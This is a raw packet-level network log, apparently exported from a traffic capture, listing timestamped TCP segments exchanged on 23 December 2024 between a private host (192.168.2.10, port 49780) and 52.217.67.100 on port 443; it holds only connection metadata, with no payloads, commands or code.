                                                                                                                                                                              Dec 23, 2024 08:09:02.860274076 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.860285044 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.860454082 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.866569996 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.866610050 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.866651058 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.866677046 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.866686106 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.906596899 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.906671047 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.953453064 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.990235090 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.990250111 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.990282059 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.990351915 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.990372896 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.990391970 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.990396023 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.990434885 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.996653080 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.996674061 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.996720076 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.996728897 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.996752024 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.003391027 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.003429890 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.003475904 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.003504038 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.003520012 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.009473085 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.009520054 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.009552002 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.009562016 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.009584904 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.016300917 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.016346931 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.016386986 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.016396999 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.016422033 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.022833109 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.022875071 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.022903919 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.022912979 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.022939920 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.029174089 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.029217958 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.029254913 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.029266119 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.029277086 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.035578966 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.035613060 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.035651922 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.035660982 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.035679102 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.078461885 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.401437044 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.453468084 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.515886068 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.515902042 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.515921116 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.515928984 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.515959024 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.515964985 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516005039 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.516046047 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.516060114 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516778946 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516803980 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516814947 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516828060 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516850948 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.516860008 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.516881943 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.518922091 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.518955946 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.518990040 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.518992901 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.519005060 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.519035101 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.519057989 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.519963026 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.519978046 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.520008087 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.520042896 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.520051956 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.520066977 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.521722078 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.521745920 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.521786928 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.521795988 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.521827936 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.522651911 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.522666931 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.522723913 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.522732019 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.522749901 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.524081945 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.524101973 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.524136066 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.524142981 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.524162054 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.525907040 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.525923967 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.525959969 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.525973082 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.525991917 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.527636051 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.527677059 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.527704954 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.527710915 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.527719021 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.527774096 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.527774096 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.529095888 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.529114008 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.529145956 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.529175997 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.529187918 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.529198885 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.530905962 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.530925989 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.530996084 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.530996084 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.531009912 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.531776905 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.531797886 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.531838894 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.531848907 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.531860113 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.533498049 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.533505917 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.533606052 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.533616066 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.534980059 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.534996033 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.535043001 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.535060883 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.535073996 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.535914898 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.535940886 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.535978079 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.535986900 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.536007881 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.537620068 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.564433098 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.564582109 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.569802046 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.569822073 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.569864035 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.569875002 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.569964886 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.569964886 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.570663929 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.576117992 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.576134920 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.576183081 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.576199055 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.576225996 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.582629919 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.582674026 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.582688093 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.582696915 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.582726002 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.625298023 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.625307083 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.635613918 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.635642052 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.635679960 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.635691881 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.635705948 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.641510963 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.641551971 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.641585112 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.641593933 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.641621113 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.648608923 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.648648024 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.648698092 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.648698092 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.648710012 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.648720980 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.654464960 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.654493093 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.654665947 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.654665947 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.654696941 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.693006039 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.693022966 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.693123102 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.759202003 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.759233952 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.759265900 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.759274960 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.759296894 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.759319067 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.765429974 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.765451908 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.765496016 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.765516043 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.765549898 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.771924973 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.771940947 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.771991968 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.772003889 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.772015095 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.778301954 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.778321981 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.778357983 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.778371096 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.778460979 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.785090923 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.785106897 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.785166025 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.785176992 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.791450977 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.791471958 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.791568041 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.791568041 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.791579962 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.797872066 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.797907114 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.797961950 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.797983885 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.798002958 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.804656029 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.804718018 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.804732084 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.804747105 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.804770947 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.844048023 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.844064951 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.871165037 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.954072952 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.954098940 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.954145908 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.954147100 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.954178095 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.954214096 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.954214096 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.954226971 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.954976082 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.954983950 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.961214066 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.961266041 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.961282969 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.961297989 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.961338043 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.967638016 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.967680931 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.967717886 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.967725992 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.967751026 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.974078894 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.974133015 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.974150896 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.974159956 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.974204063 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.974220991 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.974381924 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.980031967 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.980077028 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.980109930 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.980117083 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.980134010 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.980166912 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.980855942 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.987304926 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.987368107 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.987390995 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.987416983 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.987435102 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.993923903 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.993978977 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.994024038 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.994051933 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.994065046 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.047195911 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.047220945 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.094074011 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.111748934 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.134243965 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.143585920 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.143624067 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.143676996 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.143695116 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.143695116 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.143697977 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.143733025 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.143760920 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.143760920 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.147135019 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:04.147146940 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.149878979 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:04.149934053 CET4434978052.217.67.100192.168.2.10
